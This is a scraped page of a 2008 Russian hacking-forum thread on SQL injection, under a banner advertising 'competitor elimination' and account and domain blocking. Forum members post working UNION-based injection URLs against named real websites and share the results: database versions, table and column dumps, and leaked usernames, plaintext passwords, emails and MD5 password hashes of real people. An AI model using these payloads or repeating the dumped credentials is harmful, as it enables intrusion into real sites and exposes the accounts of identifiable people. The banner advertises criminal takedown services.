УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 506 из 1242

506

Опции темы

Поиск в этой теме

Опции просмотра

#5051

08.03.2008, 19:37

truelamer

Участник форума

Регистрация: 06.11.2007

Сообщений: 143

Провел на форуме:
350782

Репутация: 81

Цитата:

Сообщение от ZET36

truelamer
хех а
http://www.beton.ru/center.php?chp=showpage&parent=799&num=1+union+sel ect+1,2,database(),4,5,6,7,8,9,10,11/*
выполнить неполучается

Надо так:

http://www.beton.ru/center.php/?chp=showpage&parent=799&num=1+union+select+1,2,ae s_decrypt(aes_encrypt(concat(database()),1),1),4,5 ,66666,7,8,9,10,11/*

#5052

08.03.2008, 19:39

ZET36

Участник форума

Регистрация: 08.10.2007

Сообщений: 259

Провел на форуме:
500748

Репутация: 137

ок спасибо понял

#5053

08.03.2008, 19:44

truelamer

Участник форума

Регистрация: 06.11.2007

Сообщений: 143

Провел на форуме:
350782

Репутация: 81

http://www.agun.kz/?type=news&id=-1+union+select+1,2,3,4,concat(user(),char(58),vers ion(),char(58),database()),6,7,8+/*

alarko@localhost
4.1.22
wwwalarkokz

#5054

08.03.2008, 20:04

truelamer

Участник форума

Регистрация: 06.11.2007

Сообщений: 143

Провел на форуме:
350782

Репутация: 81

http://www.kaznpu.kz/kz/?annons=-1+union+select+concat(version(),char(58),user(),ch ar(58),database())+/*

http://www.kaznpu.kz/kz/?annons=-1+union+select+TABLE_NAME+from+INFORMATION_SCHEMA. TABLES+limit+20,1/*

Почему вот этот не проходит: http://www.kaznpu.kz/kz/?annons=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME=moderator+limit+0,1/*

http://www.kaznpu.kz/kz/?annons=-1+union+select+login+from+moderator/*

login: muha

#5055

08.03.2008, 23:45

vp$

Участник форума

Регистрация: 22.10.2007

Сообщений: 138

Провел на форуме:
2454040

Репутация: 177

Отправить сообщение для vp$ с помощью ICQ

www.adams-motors.ru

http://www.adams-motors.ru/new.php?id=30000000+UNION+SELECT+concat_ws(0x3a,us er_id,username,user_password,user_email,user_icq), 2,3+from+phpbb_users+limit+1,1/*

2:admin:178f6c2365ac7511b4bf37c8e89cc678(aldus885):info@art.su:
пасс на plain-text.info расшифровал за 10 сек
=======================================
www.elysium.nnov.ru сайт рок-группы Элизиум вроде

Код:

http://www.elysium.nnov.ru/news/arc.php?id=136780000000+UNION+SELECT+0x7468617420617265206675636B2121,2,3/*

Код:

http://www.elysium.nnov.ru/news/arc.php?id=136780000000+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3/*

5.0.45-log:elysium.nnov.ru@localhost:elysium
есть таблички jos_users и users

Последний раз редактировалось vp$; 09.03.2008 в 02:51..

#5056

09.03.2008, 08:34

truelamer

Участник форума

Регистрация: 06.11.2007

Сообщений: 143

Провел на форуме:
350782

Репутация: 81

http://www.design.upenn.edu/new/about/newsdetail.php?nid=99999+union+select+1,2,concat(v ersion(),char(58),user(),char(58),database()),4,5, 6,7,8,9,10,11+/*

4.1.20
penndesign@localhost
PennDesign

#5057

09.03.2008, 20:55

ReVOLVeR

Участник форума

Регистрация: 02.09.2006

Сообщений: 176

Провел на форуме:
645316

Репутация: 327

_http://www.alpha.perm.ru/iaproject/txt.php?n=-1+union+select+1/*

#5058

09.03.2008, 22:05

Климент_Ворошилов

Новичок

Регистрация: 08.12.2007

Сообщений: 21

Провел на форуме:
347718

Репутация: 36

Код:

_http://www.fishery.ru/
_http://www.fishery.ru/news/index.php?id=11687#11687
_http://www.fishery.ru/news/index.php?id=11687%27#11687
_http://www.fishery.ru/news/index.php?id=11687+order+by+7/*#11687
_http://www.fishery.ru/news/index.php?id=-11687+union+select+1,2,3,4,5,6,7/*#11687
_http://www.fishery.ru/news/index.php?id=11687+union+select+1,database(),user(),4,5,version(),7/*#11687

database - fishery
user - fishery@localhost
version - 5.0.45-community-log

23:catalogcontent
23:--1:user
23:--2:pswd
23:--3:companyname
23:--4:postaddress
23:--5:address
23:--6:phone
23:--7:fax
23:--8:city
23:--9:email
23:--10:namedomain
23:--11:contactname
23:--12:comment
23:--13:file1
23:--14:file2
23:--15:url
23:--16:file3
23:--17:file1name
23:--18:file2name
23:--19:file3name
23:--20:file1desc
23:--21:file2desc
23:--22:file3desc
23:--23:file1date
23:--24:file2date
23:--25:file3date
23:--26:file1size
23:--27:file2size
23:--28:file3size
23:--29:file1count
23:--30:file2count
23:--31:file3count
23:--32:viewcat
23:--33:viewsite
23:--34:uid
23:--35:subscribe
23:--36:created
23:--37:money_amount
23:--38:enabled


26:forums_auth
26:--1:sess_id
26:--2:name
26:--3:username
26:--4:password
26:--5:email
26:--6:webpage
26:--7:image
26:--8:icq
26:--9:aol
26:--10:yahoo
26:--11:msn
26:--12:jabber
26:--13:signature

первая десятка:
fish:death:fishmonger@mail.ru
lopantsev:uhzpyjd:lopantsev@mail.iks.ru
континент:континент:rkms@mail.ru
bioacoustik:123321:sales@bioacoustik.ru
Vostok Trust:astra57126:ankor.ltd@bk.ru
olecia:fortuna:logist4@fortlog.ru
sakhtot:bihkek:contrakt-s@bk.ru
0000y:00000:yuksf@rambler.ru
norvik:77777:norvik@bk.ru
present:dasha:present@front.ru

первая 10 с форума.

mnt:542034e38fc03450534f2400649c6ba8
fishmonger:2e8d6dbf9112a879d4ceb15403d10a78
msk.omsk:60bdd6c1e11766886e1275dccec940b8
iv_mihailov:a82d922b133be19c1171534e6594f754
hantrade:0004d0b59e19461ff126e3a08a814c33
tarakan:adb97c291e3725d0f1a76cd2c6c14673
flimpy:fa112890762d8ed70e46ee42b11b55f1
red:827ccb0eea8a706c4c34a16891f84e7b
bruja:6bfb02b76ad8bed2bec95a2282c9cae6
dinamit:48bde11a4f202709aaad3e58f24d71eb

#5059

10.03.2008, 00:00

.acme

Участник форума

Регистрация: 08.11.2007

Сообщений: 102

Провел на форуме:
1266776

Репутация: 93

Цитата:

http://gol.sao.mos.ru/news_full.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat( version(),0x3a,user(),0x3a,database()),0x71),0x71) ,4,5/*

вроде, не баян.

#5060

10.03.2008, 00:14

lexa007

Познающий

Регистрация: 23.11.2006

Сообщений: 79

Провел на форуме:
1044181

Репутация: 66

Отправить сообщение для lexa007 с помощью ICQ

Код HTML:

  http://www.satdv.net.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

http://www.aloris.ru/http://www.tatshop.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

http://kneparhia.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

http://support.gateway.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

http://glasstable.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

Страница 506 из 1242

506

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход